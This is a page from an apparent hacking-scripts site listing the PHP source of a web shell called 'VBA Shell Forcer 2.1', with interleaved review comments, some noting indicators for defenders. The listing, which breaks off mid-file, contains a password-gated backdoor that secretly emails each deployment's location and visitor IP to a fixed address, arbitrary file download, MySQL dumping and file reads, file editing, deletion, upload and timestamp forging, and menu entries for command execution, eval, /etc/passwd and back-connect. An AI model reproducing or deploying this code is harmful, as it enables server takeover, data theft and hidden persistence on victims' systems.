HackingScripts

Hack Scripts for everybody

VBA Shell Forcer

27 Apr 2015

VBA SHELL FORCER - VERSION 2.1 Source code

Edited & developed by VBATEAM

   1 <?php
   2 /****************************************\
   3 |*    VBA SHELL FORCER - VERSION 2.1  *|
   4 |*     Edit & Develop by VBATEAM        *|
   5 |*      http://vbateam.net            *|
   6 |*    ==  Hacking & Security  ==        *|
   7 \****************************************/
   // Bootstrap: tunes the runtime (error level 7, output buffering, no execution time
   // limit), records a start time, defines environment constants, then imports request
   // parameters as global variables.
   // NOTE(review): set_magic_quotes_runtime(), get_magic_quotes_gpc(), eregi() and the
   // $str{0} offset syntax used here were removed in PHP 7.0 / 8.0, so the listing as
   // written targets PHP 5.x-era interpreters.
   8 error_reporting(7);
   9 @set_magic_quotes_runtime(0);
  10 ob_start();
  11 $mtime = explode(' ', microtime());
  12 $starttime = $mtime[1] + $mtime[0];
     // SA_ROOT: the directory holding this script, with forward slashes and a trailing '/'.
  13 define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
  14 //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
  15 define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
  16 define('IS_COM', class_exists('COM') ? 1 : 0);
  17 define('IS_GPC', get_magic_quotes_gpc());
     // IS_PHPINFO is 0 when "phpinfo" appears in the configured disable_functions list.
  18 $dis_func = get_cfg_var('disable_functions');
  19 define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
  20 @set_time_limit(0);
     // Re-creates register_globals: every GET and POST parameter whose name does not start
     // with '_' becomes a global variable of the same name ($$_key). Every bare variable the
     // script reads later without assigning it ($action, $doing, $password, $thefile, $dir,
     // $charset, ...) is therefore request-controlled.
     // $admin is assigned after this loop, so a request parameter named "admin" is overwritten.
     // For defenders: a variable-variable import of $_GET/$_POST next to @set_time_limit(0)
     // is a useful static marker when scanning a web root for copies of this file.
  21 foreach (array('_GET', '_POST') as $_request) {
  22     foreach ($$_request as $_key => $_value) {
  23         if ($_key{0} != '_') {
  24             if (IS_GPC) {
                     // s_array() is defined outside this excerpt; presumably it undoes
                     // magic-quotes escaping - confirm against its definition.
  25                 $_value = s_array($_value);
  26             }
  27             $$_key = $_value;
  28         }
  29     }
  30 }
  31 /*=================  Info Login  ================*/
     // Access-control settings. 'check' switches the password gate on and 'pass' is a
     // hard-coded plaintext password. The cookie* entries are not read anywhere in this
     // excerpt (presumably consumed by scookie(), defined elsewhere - confirm).
     // For defenders: the fixed password literal and the 'vbapass' cookie name used by the
     // login code are static strings, so they can serve as indicators for this sample.
  32 $admin = array();
  33 $admin['check'] = true;
  34 $admin['pass'] = 'byg'; // Password login
  35 $admin['cookiepre'] = '';
  36 $admin['cookiedomain'] = '';
  37 $admin['cookiepath'] = '/';
  38 $admin['cookielife'] = 86400;
  39 /*===================== End =====================*/
     // $charset is never assigned in this excerpt, so it can only arrive as a request
     // parameter through the import loop at the top of the file. Note that the 'latin1'
     // choice is answered with iso-8859-2.
  40 if ($charset == 'utf8') {
  41     header("content-Type: text/html; charset=utf-8");
  42 } elseif ($charset == 'big5') {
  43     header("content-Type: text/html; charset=big5");
  44 } elseif ($charset == 'gbk') {
  45     header("content-Type: text/html; charset=gbk");
  46 } elseif ($charset == 'latin1') {
  47     header("content-Type: text/html; charset=iso-8859-2");
  48 }
     // $self is later written into HTML (meta refresh, form actions) without escaping;
     // PHP_SELF can carry client-supplied path-info.
  49 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
  50 $timestamp = time();
  51 /*===================== Login =====================*/
     // Logout: expires the 'vbapass' cookie and redirects back to the script itself.
     // scookie() and p() are defined outside this excerpt.
  52 if ($action == "logout") {
  53     scookie('vbapass', '', -86400 * 365);
  54     p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
  55     p('<body background=black>');
  56     exit;
  57 }
     // Password gate, active only while $admin['check'] is true.
  58 if ($admin['check']) {
  59     if ($doing == 'login') {
             // Loose (==) comparison of the request-supplied $password with the hard-coded value.
  60         if ($admin['pass'] == $password) {
                 // The submitted password itself becomes the cookie value, so the cookie is a
                 // replayable plaintext credential rather than a session token.
  61             scookie('vbapass', $password);
  62             // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
                 // Phone-home on every successful login: mails the host name, request URI, the
                 // visitor's IP and a timestamp to the fixed address below, with a From of
                 // shell@<resolved server IP>. Whoever controls that mailbox learns where each
                 // copy is deployed. Outbound mail of this shape from a web-server process is a
                 // detection opportunity (mail logs, egress SMTP monitoring).
                 // NOTE(review): the text from "/* <![CDATA[ */" to "/* ]]> */" inside the
                 // $to_email literal is the hosting page's e-mail de-obfuscation script captured
                 // with the listing, not part of the script; the original presumably closed the
                 // string right after the address.
  63             $time_shell = "" . date("d/m/Y - H:i:s") . "";
  64             $ip_remote = $_SERVER["REMOTE_ADDR"];
  65             $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
  66             $to_email = 'minhduong.pjn@gmail.com
  67 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */';
  68             $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . "  - " . $_SERVER['HTTP_HOST'] . "";
  69             $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
  70             $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
                 // '@' hides any mail() failure, so the operator of the script sees nothing.
  71             @mail($to_email, $server_mail, $linkcr, $header);
  72             p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
  73             p('<body bgcolor=black>
  74 <BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World  - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
  75             exit;
  76         } else {
  77             $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
  78             echo $err_mess;
  79         }
  80     }
         // Every request must carry a 'vbapass' cookie equal (loose !=) to the password;
         // otherwise control passes to loginpage(), which is defined outside this excerpt
         // (presumably it prints the login form and stops - confirm).
  81     if ($_COOKIE['vbapass']) {
  82         if ($_COOKIE['vbapass'] != $admin['pass']) {
  83             loginpage();
  84         }
  85     } else {
  86         loginpage();
  87     }
  88 }
  89 /*===================== Login =====================*/
  // Pre-HTML request handlers that need to send their own headers: phpinfo output,
  // raw file download, and MySQL table dump. All inputs are request parameters.
  90 $errmsg = '';
     // phpinfo() is only called when it is not listed in disable_functions (IS_PHPINFO).
  91 if ($action == 'phpinfo') {
  92     if (IS_PHPINFO) {
  93         phpinfo();
  94     } else {
  95         $errmsg = 'phpinfo() function has non-permissible';
  96     }
  97 }
     // File download: $thefile is a request-supplied path that is not confined to any base
     // directory, so any file readable by the PHP process is returned as an attachment.
     // The Content-type and filename headers are built from components of that same path.
  98 if ($doing == 'downfile' && $thefile) {
  99     if (!@file_exists($thefile)) {
 100         $errmsg = 'The file you want Downloadable was nonexistent';
 101     } else {
 102         $fileinfo = pathinfo($thefile);
 103         header('Content-type: application/x-' . $fileinfo['extension']);
 104         header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
 105         header('Content-Length: ' . filesize($thefile));
 106         @readfile($thefile);
 107         exit;
 108     }
 109 }
     // MySQL dump as a download: connects with request-supplied host/user/password/database
     // (dbconn() and q() are defined outside this excerpt) and walks SHOW tables, keeping
     // only tables named as values in the request-supplied $table array.
     // Uses the mysql_* extension, which was removed in PHP 7.0.
 110 if ($doing == 'backupmysql' && !$saveasfile) {
 111     dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
         // array_flip turns the selected table names into keys for the isset() test below.
 112     $table = array_flip($table);
 113     $result = q("SHOW tables");
 114     if (!$result) p('<h2>' . mysql_error() . '</h2>');
 115     $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
 116     header('Content-type: application/unknown');
 117     header('Content-Disposition: attachment; filename=' . $filename);
         // NOTE(review): $mysqldata is accumulated but never echoed in this block; whether
         // sqldumptable() (not visible here) emits the dump itself cannot be told from here.
 118     $mysqldata = '';
 119     while ($currow = mysql_fetch_array($result)) {
 120         if (isset($table[$currow[0]])) {
 121             $mysqldata.= sqldumptable($currow[0]);
 122         }
 123     }
 124     mysql_close();
 125     exit;
 126 }
 127 // Mysql
     // File read routed through the MySQL server instead of PHP's own file functions:
     // first SELECT load_file(), and when q() returns a false value, LOAD DATA LOCAL INFILE
     // into a scratch table. The result is sent back as an attachment.
     // For defenders: the scratch table name tmp_angel and the __angel_<unix time>_eof__
     // field/line terminators are fixed strings that show up in database query logs.
 128 if ($doing == 'mysqldown') {
 129     if (!$dbname) {
 130         $errmsg = 'Please input dbname';
 131     } else {
 132         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
             // file_exists() is evaluated by PHP on the web host before any SQL is sent.
 133         if (!file_exists($mysqldlfile)) {
 134             $errmsg = 'The file you want Downloadable was nonexistent';
 135         } else {
                 // $mysqldlfile is interpolated into this query unescaped; only the LOAD DATA
                 // statement below passes it through addslashes().
 136             $result = q("select load_file('$mysqldlfile');");
 137             if (!$result) {
 138                 q("DROP TABLE IF EXISTS tmp_angel;");
 139                 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
 140                 //Download SQL
 141                 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
 142                 $result = q("select content from tmp_angel");
 143                 q("DROP TABLE tmp_angel");
 144             }
 145             $row = @mysql_fetch_array($result);
 146             if (!$row) {
 147                 $errmsg = 'Load file failed ' . mysql_error();
 148             } else {
 149                 $fileinfo = pathinfo($mysqldlfile);
 150                 header('Content-type: application/x-' . $fileinfo['extension']);
 151                 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
                     // "Accept-Length" is not a standard HTTP response header.
 152                 header("Accept-Length: " . strlen($row[0]));
 153                 echo $row[0];
 154                 exit;
 155             }
 156         }
 157     }
 158 }
 159 ?>
 160 <html>
 161 <head>
 162 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 163 <title><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?></title>
 164 <style type="text/css">
 165 body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
 166 
 167 a {color: #74A202;text-decoration:none;}
 168 a:hover{color: #f00;text-decoration:underline;}
 169 .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
 170 .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
 171 .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
 172 .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
 173 .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
 174 .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
 175 .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
 176 .head td span{font-weight:normal;}
 177 form{margin:0;padding:0;}
 178 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
 179 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
 180 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
 181 input, textarea, button
 182 {
 183    font-size: 9pt;
 184    color: #ccc;
 185    font-family: verdana, sans-serif;
 186    background-color: #202020;
 187    border-left: 1px solid #74A202;
 188    border-top: 1px solid #74A202;
 189    border-right: 1px solid #74A202;
 190    border-bottom: 1px solid #74A202;
 191 }
 192 select
 193 {
 194    font-size: 8pt;
 195    font-weight: normal;
 196    color: #ccc;
 197    font-family: verdana, sans-serif;
 198    background-color: #202020;
 199 }
 200 
 201 </style>
 202 <script type="text/javascript">
 // Copies the state of the form's 'chkall' checkbox onto every other element of that form.
 203 function CheckAll(form) {
 204    for(var i=0;i<form.elements.length;i++) {
 205        var e = form.elements[i];
            // The brace-less if governs only the assignment on the next line.
 206        if (e.name != 'chkall')
 207        e.checked = form.chkall.checked;
 208     }
 209 }
 // Shorthand for document.getElementById(id).
 210 function $(id) {
 211    return document.getElementById(id);
 212 }
 // Sets the 'action' field of the element with id 'goaction' to act and submits that form;
 // the menu links on this page call it to switch between the panel's sections.
 213 function goaction(act){
 214    $('goaction').action.value=act;
 215    $('goaction').submit();
 216 }
 217 </script>
 218 </head>
 219 <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
 220 
 221 
 222 <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
 223                <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
 224                    <tr>
 225                        <td align="center" valign=center>
 226                 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">
 227                   Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
 228                  </div>
 229                </td>
 230                    </tr>
 231                </table>
 232             </div>
 233  <script>
 // "Loading" overlay control. Legacy browser sniffing (document.layers, document.all,
 // getElementById) picks the handle for the element with id "loading"; init(), wired to
 // the body's onLoad attribute, hides it once the page has loaded.
 234  var ld=(document.all);
 235   var ns4=document.layers;
 236  var ns6=document.getElementById&&!document.all;
 237  var ie4=document.all;
 238   if (ns4)
 239    ld=document.loading;
 240  else if (ns6)
 241    ld=document.getElementById("loading").style;
 242  else if (ie4)
 243    ld=document.all.loading.style;
 244   function init()
 245  {
 246  if(ns4){ld.visibility="hidden";}
 247  else if (ns6||ie4) ld.display="none";
 248  }
 249  </script>
 250 
 251 
 252 
 253 
 254 <table width="100%" border="0" cellpadding="0" cellspacing="0">
 255    <tr class="head_small">
 256        <td  width=100%>
 257        <table width=100%><tr class="head_small"><td  width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self; ?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
 258        <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?>  | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
 259 
 260        <?php
 // Environment summary printed in the page header: which client libraries are available,
 // the PHP version, the disable_functions list, the uname string and script-owner ids.
 // For defenders: this is host reconnaissance data; a response body that combines
 // "Disable functions", "Uname -a" and uid/gid values is something response-inspection
 // rules can key on.
 261 $curl_on = @function_exists('curl_version');
 262 $mysql_on = @function_exists('mysql_connect');
 263 $mssql_on = @function_exists('mssql_connect');
 264 $pg_on = @function_exists('pg_connect');
 265 $ora_on = @function_exists('ocilogon');
     // NOTE(review): $safe_mode is not assigned anywhere in this excerpt, so this flag
     // reflects a request parameter of that name (via the import loop) or register_globals,
     // not the interpreter's actual safe_mode setting.
 266 echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
 267 echo "PHP version: <b>" . @phpversion() . "</b> - ";
 268 echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
 269 echo "MySQL: <b>";
     // Each *_on probe below repeats the assignment already made above.
 270 $mysql_on = @function_exists('mysql_connect');
 271 if ($mysql_on) {
 272     echo "<font color=green>ON</font></b> - ";
 273 } else {
 274     echo "<font color=red>OFF</font></b> - ";
 275 }
 276 echo "MSSQL: <b>";
 277 $mssql_on = @function_exists('mssql_connect');
 278 if ($mssql_on) {
 279     echo "<font color=green>ON</font></b> - ";
 280 } else {
 281     echo "<font color=red>OFF</font></b> - ";
 282 }
 283 echo "PostgreSQL: <b>";
 284 $pg_on = @function_exists('pg_connect');
 285 if ($pg_on) {
 286     echo "<font color=green>ON</font></b> - ";
 287 } else {
 288     echo "<font color=red>OFF</font></b> - ";
 289 }
 290 echo "Oracle: <b>";
 291 $ora_on = @function_exists('ocilogon');
     // Only the OFF branch emits the trailing <BR>; the ON branch leaves the line open.
 292 if ($ora_on) {
 293     echo "<font color=green>ON</font></b>";
 294 } else {
 295     echo "<font color=red>OFF</font></b><BR>";
 296 }
 297 echo "Disable functions : <b>";
 298 if ('' == ($df = @ini_get('disable_functions'))) {
 299     echo "<font color=green>NONE</font></b><BR>";
 300 } else {
 301     echo "<font color=red>$df</font></b><BR>";
 302 }
     // Only the first 120 bytes of the uname string are shown.
 303 echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
     // $SERVER_SOFTWARE is not assigned in this excerpt (same caveat as $safe_mode).
     // getmyuid(), getmygid() and get_current_user() report the owner of the script file,
     // not the effective user of the PHP process.
 304 echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
 305 ?>
 306        </td></tr></table></td>
 307    </tr>
 308    <tr class="alt1">
 309        <td  width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span>   <br />
 310 --------------------------------------------------------------------------------------<br />
 311 
 312            <a href="javascript:goaction('file');">File Manager</a> |
 313            <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
 314            <a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
 315            <a href="javascript:goaction('shell');">Execute Command</a> |
 316            <a href="javascript:goaction('phpenv');">PHP Variable</a> |
 317            <a href="javascript:goaction('eval');">Eval PHP Code</a>
 318            <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
 319 } ?>
 320            <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
 321 } ?>
 322            <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
 323 } ?>
 324        </td>
 325    </tr>
 326 </table>
 327 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
 328 <?php
 // Emits the hidden 'goaction' form that the page's goaction() JavaScript submits, shows
 // any pending error message, then resolves the working directory for the file manager.
 // formhead(), makehide(), formfoot(), m(), getPath() and ue() are defined outside this excerpt.
 329 formhead(array('name' => 'goaction'));
 330 makehide('action');
 331 formfoot();
 332 $errmsg && m($errmsg);
 333 // Dir function
     // $dir is request-supplied (import loop at the top of the file) and defaults to '.';
     // nothing in this excerpt confines it to the web root.
 334 !$dir && $dir = '.';
 335 $nowpath = getPath(SA_ROOT, $dir);
     // Ensure $dir ends with '/' so file names can be appended directly.
 336 if (substr($dir, -1) != '/') {
 337     $dir = $dir . '/';
 338 }
     // presumably ue() URL-encodes the path - confirm against its definition.
 339 $uedir = ue($dir);
 340 if (!$action || $action == 'file') {
 341     // Non-writeable
 342     $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
 343     // Delete dir
 344     if ($doing == 'deldir' && $thefile) {
 345         if (!file_exists($thefile)) {
 346             m($thefile . ' directory does not exist');
 347         } else {
 348             m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
 349         }
 350     }
 351     // Create new dir
 352     elseif ($newdirname) {
 353         $mkdirs = $nowpath . $newdirname;
 354         if (file_exists($mkdirs)) {
 355             m('Directory has already existed');
 356         } else {
 357             m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
 358             @chmod($mkdirs, 0777);
 359         }
 360     }
 361     // Upload file
 362     elseif ($doupfile) {
 363         m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
 364     }
 365     // Edit file
 366     elseif ($editfilename && $filecontent) {
 367         $fp = @fopen($editfilename, 'w');
 368         m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
 369         @fclose($fp);
 370     }
 371     // Modify
 372     elseif ($pfile && $newperm) {
 373         if (!file_exists($pfile)) {
 374             m('The original file does not exist');
 375         } else {
 376             $newperm = base_convert($newperm, 8, 10);
 377             m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
 378         }
 379     }
 380     // Rename
 381     elseif ($oldname && $newfilename) {
 382         $nname = $nowpath . $newfilename;
 383         if (file_exists($nname) || !file_exists($oldname)) {
 384             m($nname . ' has already existed or original file does not exist');
 385         } else {
 386             m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
 387         }
 388     }
 389     // Copu
 390     elseif ($sname && $tofile) {
 391         if (file_exists($tofile) || !file_exists($sname)) {
 392             m('The goal file has already existed or original file does not exist');
 393         } else {
 394             m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
 395         }
 396     }
 397     // File exit
 398     elseif ($curfile && $tarfile) {
 399         if (!@file_exists($curfile) || !@file_exists($tarfile)) {
 400             m('The goal file has already existed or original file does not exist');
 401         } else {
 402             $time = @filemtime($tarfile);
 403             m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
 404         }
 405     }
 406     // Date
 407     elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
 408         if (!@file_exists($curfile)) {
 409             m(basename($curfile) . ' does not exist');
 410         } else {
 411             $time = strtotime("$year-$month-$day $hour:$minute:$second");
 412             m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
 413         }
 414     }
 415     // Download
 416     elseif ($doing == 'downrar') {
 417         if ($dl) {
 418             $dfiles = '';
 419             foreach ($dl as $filepath => $value) {
 420                 $dfiles.= $filepath . ',';
 421             }
 422             $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
 423             $dl = explode(',', $dfiles);
 424             $zip = new PHPZip($dl);
 425             $code = $zip->out;
 426             header('Content-type: application/octet-stream');
 427             header('Accept-Ranges: bytes');
 428             header('Accept-Length: ' . strlen($code));
 429             header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
 430             echo $code;
 431             exit;
 432         } else {
 433             m('Please select file(s)');
 434         }
 435     }
 436     // Delete file
 437     elseif ($doing == 'delfiles') {
 438         if ($dl) {
 439             $dfiles = '';
 440             $succ = $fail = 0;
 441             foreach ($dl as $filepath => $value) {
 442                 if (@unlink($filepath)) {
 443                     $succ++;
 444                 } else {
 445                     $fail++;
 446                 }
 447             }
 448             m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
 449         } else {
 450             m('Please select file(s)');
 451         }
 452     }
 453     // Function Newdir
 454     formhead(array('name' => 'createdir'));
 455     makehide('newdirname');
 456     makehide('dir', $nowpath);
 457     formfoot();
 458     formhead(array('name' => 'fileperm'));
 459     makehide('newperm');
 460     makehide('pfile');
 461     makehide('dir', $nowpath);
 462     formfoot();
 463     formhead(array('name' => 'copyfile'));
 464     makehide('sname');
 465     makehide('tofile');
 466     makehide('dir', $nowpath);
 467     formfoot();
 468     formhead(array('name' => 'rename'));
 469     makehide('oldname');
 470     makehide('newfilename');
 471     makehide('dir', $nowpath);
 472     formfoot();
 473     formhead(array('name' => 'fileopform'));
 474     makehide('action');
 475     makehide('opfile');
 476     makehide('dir');
 477     formfoot();
 478     $free = @disk_free_space($nowpath);
 479     !$free && $free = 0;
 480     $all = @disk_total_space($nowpath);
 481     !$all && $all = 0;
 482     $used = $all - $free;
 483     $used_percent = @round(100 / ($all / $free), 2);
 484     p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
 485 ?>
 486 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
 487   <form action="" method="post" id="godir" name="godir">
 488   <tr>
 489     <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
 490    <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
 491     <td nowrap><input class="bt" value="GO" type="submit"></td>
 492   </tr>
 493   </form>
 494 </table>
 495 <script type="text/javascript">
 496 function createdir(){
 497    var newdirname;
 498    newdirname = prompt('Please input the directory name:', '');
 499    if (!newdirname) return;
 500    $('createdir').newdirname.value=newdirname;
 501    $('createdir').submit();
 502 }
 503 function fileperm(pfile){
 504    var newperm;
 505    newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
 506    if (!newperm) return;
 507    $('fileperm').newperm.value=newperm;
 508    $('fileperm').pfile.value=pfile;
 509    $('fileperm').submit();
 510 }
 511 function copyfile(sname){
 512    var tofile;
 513    tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
 514    if (!tofile) return;
 515    $('copyfile').tofile.value=tofile;
 516    $('copyfile').sname.value=sname;
 517    $('copyfile').submit();
 518 }
 519 function rename(oldname){
 520    var newfilename;
 521    newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
 522    if (!newfilename) return;
 523    $('rename').newfilename.value=newfilename;
 524    $('rename').oldname.value=oldname;
 525    $('rename').submit();
 526 }
 527 function dofile(doing,thefile,m){
 528    if (m && !confirm(m)) {
 529        return;
 530    }
 531    $('filelist').doing.value=doing;
 532    if (thefile){
 533        $('filelist').thefile.value=thefile;
 534    }
 535    $('filelist').submit();
 536 }
 537 function createfile(nowpath){
 538    var filename;
 539    filename = prompt('Please input the file name:', '');
 540    if (!filename) return;
 541    opfile('editfile',nowpath + filename,nowpath);
 542 }
 543 function opfile(action,opfile,dir){
 544    $('fileopform').action.value=action;
 545    $('fileopform').opfile.value=opfile;
 546    $('fileopform').dir.value=dir;
 547    $('fileopform').submit();
 548 }
 549 function godir(dir,view_writable){
 550    if (view_writable) {
 551        $('godir').view_writable.value=1;
 552    }
 553    $('godir').dir.value=dir;
 554    $('godir').submit();
 555 }
 556 </script>
 557   <?php
 558     tbhead();
 559     p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
 560     p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
 561     p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
 562     if ($view_writable) {
 563         p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
 564     } else {
 565         p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
 566     }
 567     p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
 568     if (IS_WIN && IS_COM) {
 569         $obj = new COM('scripting.filesystemobject');
 570         if ($obj && is_object($obj)) {
 571             $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
 572             foreach ($obj->Drives as $drive) {
 573                 if ($drive->DriveType == 2) {
 574                     p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . '&#13;Free:' . sizecount($drive->FreeSpace) . '&#13;Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
 575                 } else {
 576                     p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
 577                 }
 578             }
 579         }
 580     }
 581     p('</td></tr></form>');
 582     p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
 583     // Get path
 584     $dirdata = array();
 585     $filedata = array();
 586     if ($view_writable) {
